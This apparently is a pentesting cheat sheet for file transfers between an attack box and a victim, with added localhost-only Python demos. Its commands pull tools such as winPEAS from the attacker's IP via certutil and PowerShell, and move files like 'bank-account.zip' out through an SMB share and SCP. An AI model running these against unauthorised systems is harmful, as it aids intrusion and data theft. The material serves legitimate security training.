File Transfers

Linux and Windows file transfers

Python HTTP Server

Hosting files with Python's built-in HTTP server is straightforward (stop it with Ctrl+C). It serves the directory it is started in, so run it from the folder that holds the files to transfer:

# Hosting machine (Python 3)
python3 -m http.server

# Hosting machine (legacy Python 2; SimpleHTTPServer no longer exists in Python 3)
python -m SimpleHTTPServer

# Connecting machine:
curl -o output.txt http://IP_Address:portnumber/filename.txt
# or
wget http://IP_Address:portnumber/filename.txt

The default port is 8000. A different port is specified by appending it to the end of the command, like so:

python3 -m http.server 80
# or, Python 2:
python -m SimpleHTTPServer 80

Ports below 1024 need root. The server has no authentication: anyone who can reach the port can list and download everything in that directory, so stop it as soon as the transfer is done, and compare a hash (sha256sum) of the file on both ends, since a download that stalled half way still produces a file.
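The following is an added example, not code from the cheat sheet. It does in-process on 127.0.0.1 what `python3 -m http.server` on the attack box and `curl -o` (or certutil, WebClient.DownloadFile and Invoke-WebRequest) on the target do, plus the integrity check the one-liners lack: the receiver refuses to keep a file whose SHA-256 does not match the hash computed on the hosting machine. The file name, its contents and the port are constructed for the demo.

```python
"""Serve a directory over HTTP and download a file from it, verifying its SHA-256.

Added example (not the cheat sheet's own code); file name, contents and port are
constructed for the demo.
"""
import hashlib
import http.server
import os
import tempfile
import threading
import urllib.request
from functools import partial


class QuietHandler(http.server.SimpleHTTPRequestHandler):
    """SimpleHTTPRequestHandler without per-request logging to stderr."""

    def log_message(self, format, *args):
        pass


def sha256_of(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def start_http_server(directory: str):
    """Equivalent of `python3 -m http.server 0 --directory DIR` bound to localhost.

    Port 0 lets the OS pick a free port. Returns (server, port); the server runs
    in a daemon thread until server.shutdown() is called.
    """
    handler = partial(QuietHandler, directory=directory)
    srv = http.server.ThreadingHTTPServer(("127.0.0.1", 0), handler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, srv.server_address[1]


def fetch(url: str, dest: str, expected_sha256: str) -> str:
    """Download url to dest (like `curl -o dest url`) and keep it only if its
    SHA-256 matches the value computed on the hosting machine (sha256sum FILE).

    ProxyHandler({}) ignores any http_proxy environment variable so the request
    really goes to the loopback address.
    """
    opener = urllib.request.build_opener(urllib.request.ProxyHandler({}))
    with opener.open(url, timeout=10) as resp:
        data = resp.read()
    actual = sha256_of(data)
    if actual != expected_sha256:
        raise ValueError(f"hash mismatch: expected {expected_sha256}, got {actual}")
    with open(dest, "wb") as f:
        f.write(data)
    return actual


def demo() -> bool:
    """Host a constructed 'tool.sh', fetch it with the right hash, then confirm a
    wrong hash (a truncated or tampered download) is rejected."""
    with tempfile.TemporaryDirectory() as hostdir, tempfile.TemporaryDirectory() as target:
        payload = b"#!/bin/sh\necho 'constructed sample, stands in for linpeas.sh'\n"
        with open(os.path.join(hostdir, "tool.sh"), "wb") as f:
            f.write(payload)
        expected = sha256_of(payload)  # what sha256sum tool.sh prints on the host
        srv, port = start_http_server(hostdir)
        url = f"http://127.0.0.1:{port}/tool.sh"
        try:
            got = fetch(url, os.path.join(target, "tool.sh"), expected)
            try:
                fetch(url, os.path.join(target, "bad.sh"), "0" * 64)
                rejected = False
            except ValueError:
                rejected = True
        finally:
            srv.shutdown()
            srv.server_close()
    return got == expected and rejected


if __name__ == "__main__":
    print("transfer verified:", demo())
```

Binding to 127.0.0.1 keeps the demo local; on an engagement the server binds to the interface facing the target and the hash is carried over by hand (read it off the attack box, check it on the victim).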

Netcat

# receiving/listening (start this side first):
nc -l -p 4444 > outfile.txt

# sending/connecting (-w 3: give up after 3 s idle, so the sender exits once the file is through):
nc -w 3 DEST_IP_ADDRESS 4444 < sendfile.txt

Netcat gives no indication of whether the whole file arrived, so compare sha256sum (or md5sum) of both copies afterwards. The stream is unencrypted and unauthenticated, and whoever connects to the listener first writes into outfile.txt.
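Added example, not code from the cheat sheet: a netcat-style raw TCP transfer between a listener (the `nc -l -p PORT > outfile` side) and a sender (the `nc -w 3 HOST PORT < sendfile` side), run against each other on 127.0.0.1 with constructed data. Bare nc just copies bytes until the connection closes, so a transfer cut off mid-way looks the same as a finished one; here the sender prefixes the byte count and SHA-256, which lets the receiver tell the two apart. The header layout is this example's own, not a netcat feature.

```python
"""Netcat-style raw TCP file transfer with the checks plain nc does not give you.

Added example (not the cheat sheet's own code). recv_file() plays the part of
`nc -l -p PORT > outfile`, send_file() the part of `nc -w 3 HOST PORT < sendfile`.
The length+digest header is this example's own convention. Runs on 127.0.0.1
with constructed data.
"""
import hashlib
import socket
import struct
import threading

HEADER = struct.Struct("!Q32s")  # 8-byte payload length + 32-byte SHA-256 digest


def send_file(host: str, port: int, data: bytes, truncate: bool = False, timeout: float = 3.0):
    """Connect, send header then payload, then half-close the socket (what nc does
    when stdin hits EOF). truncate=True announces the full length but stops half
    way, simulating a connection that died during the transfer."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(HEADER.pack(len(data), hashlib.sha256(data).digest()))
        s.sendall(data[: len(data) // 2] if truncate else data)
        s.shutdown(socket.SHUT_WR)


def _recv_exact(conn: socket.socket, n: int) -> bytes:
    """Read exactly n bytes or raise if the peer closes early."""
    buf = bytearray()
    while len(buf) < n:
        chunk = conn.recv(min(65536, n - len(buf)))
        if not chunk:
            raise ConnectionError(f"peer closed after {len(buf)} of {n} bytes: truncated transfer")
        buf.extend(chunk)
    return bytes(buf)


def recv_file(listener: socket.socket, timeout: float = 3.0) -> bytes:
    """Accept one connection, read exactly the announced length, verify the digest."""
    conn, _ = listener.accept()
    with conn:
        conn.settimeout(timeout)
        length, digest = HEADER.unpack(_recv_exact(conn, HEADER.size))
        body = _recv_exact(conn, length)
        if hashlib.sha256(body).digest() != digest:
            raise ValueError("SHA-256 mismatch: payload corrupted in transit")
        return body


def transfer(data: bytes, truncate: bool = False) -> bytes:
    """Run listener and sender against each other on localhost and return what the
    listener received; any receiver-side error is re-raised in the caller."""
    listener = socket.socket()
    listener.bind(("127.0.0.1", 0))  # port 0: let the OS pick a free port
    listener.listen(1)
    port = listener.getsockname()[1]
    outcome = {}

    def run_listener():
        try:
            outcome["data"] = recv_file(listener)
        except Exception as exc:  # hand the error back to the main thread
            outcome["error"] = exc

    t = threading.Thread(target=run_listener)
    t.start()
    try:
        send_file("127.0.0.1", port, data, truncate=truncate)
    finally:
        t.join()
        listener.close()
    if "error" in outcome:
        raise outcome["error"]
    return outcome["data"]


def demo() -> bool:
    """A 1 MiB constructed payload round-trips intact; a truncated one is rejected."""
    payload = bytes(range(256)) * 4096
    intact = transfer(payload) == payload
    try:
        transfer(payload, truncate=True)
        return False  # a truncated transfer must not be accepted
    except ConnectionError:
        return intact


if __name__ == "__main__":
    print("netcat-style transfer verified:", demo())
```

With real netcat there is no header, so the equivalent check is the manual one from the section above: hash the file on both ends before trusting it.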

CertUtil

certutil -urlcache -split -f "http://IP_ADDRESS:8000/winpeas.bat" winpeas.bat
# or
certutil -urlcache -split -f "http://IP_ADDRESS:PORT/sourcefile.txt" NamedOutFile.txt

certutil is a signed Windows binary, but downloading with -urlcache is widely flagged by AV/EDR, so expect it to be blocked or alerted on hardened hosts.

Powershell

powershell -c "(New-Object Net.WebClient).DownloadFile('http://ip-addr:port/file', 'output-file')"

Quote the whole expression when launching from cmd.exe, otherwise the parentheses are mangled. Give output-file a full path: .NET resolves relative paths against the process working directory, which is not always PowerShell's current location.

Setting up SMB Server

This uses smbserver.py from impacket (see the note at the bottom of the page on installing it; on current Kali the same script is packaged as impacket-smbserver). Newer Windows builds refuse SMBv1 by default, so start the share with -smb2support:

# From attack machine (share name TMP, backed by /tmp; any folder works):
sudo python smbserver.py -smb2support TMP /tmp

# Move the file into the shared folder
cp whoami.exe /tmp/whoami.exe

# From the Windows victim machine, copy the file into the current directory:
copy \\192.168.119.134\TMP\whoami.exe .

# From victim machine, to list SMB share contents:
dir \\192.168.119.134\TMP

# From victim machine, to put a file on the attacking machine's SMB share (exfiltrate):
move bank-account.zip \\192.168.119.134\TMP

# SMBv1 is deprecated and often removed on newer Windows. If the share is unreachable
# and -smb2support is not an option, check whether the SMB1 client is still installed:
Get-WindowsOptionalFeature -Online -FeatureName SMB1Protocol

Get-WindowsOptionalFeature only reports the state. Re-enabling SMB1 needs administrator rights and is noisy, so prefer serving SMB2 from the attack side. The share is unauthenticated: anyone on the network can read and write it while it is up.

SSH transfers to Attack Machine (exfiltrate)

  1. Ensure OpenSSH is installed on the Kali machine:

apt list openssh-server

  2. Create a throwaway user (for example with adduser) so that you never type your real credentials on the victim machine; anything entered there can be keylogged or end up in a shell history. If you must log in as root instead, edit /etc/ssh/sshd_config like so:

FROM:
#PermitRootLogin prohibit-password

TO:
PermitRootLogin yes

Revert this when the engagement is over: it exposes the attack box's root account to password guessing from the target network.

Start and stop SSH:

systemctl start ssh

systemctl stop ssh

Using SCP to copy files over SSH.

#from victim machine, after following the above steps to enable SSH:
scp PATH_TO_LOCALFILE USER@DEST_IP:/file/path/for/newfile

#example (-r copies a whole directory)
scp -r ./crossfile kali@192.168.119.101:/home/kali/crossfilefires

Invoke-WebRequest (HTTP request, like curl)

Invoke-WebRequest "http://10.10.14.2:80/taskkill.exe" -OutFile "taskkill.exe"

On Windows PowerShell 5.1 and earlier add -UseBasicParsing, otherwise the cmdlet depends on Internet Explorer's engine and can fail on hosts where IE has never been run.

Last updated 4 years ago

Note on smbserver.py: it ships with impacket. Make sure the whole impacket package is unpacked and installed (for example under /opt, running "pip install ." inside the unpacked tree), then copy examples/smbserver.py to your working directory. More info:

https://blog.ropnop.com/transferring-files-from-kali-to-windows/#setting-up-the-server
https://raw.githubusercontent.com/SecureAuthCorp/impacket/master/examples/smbserver.py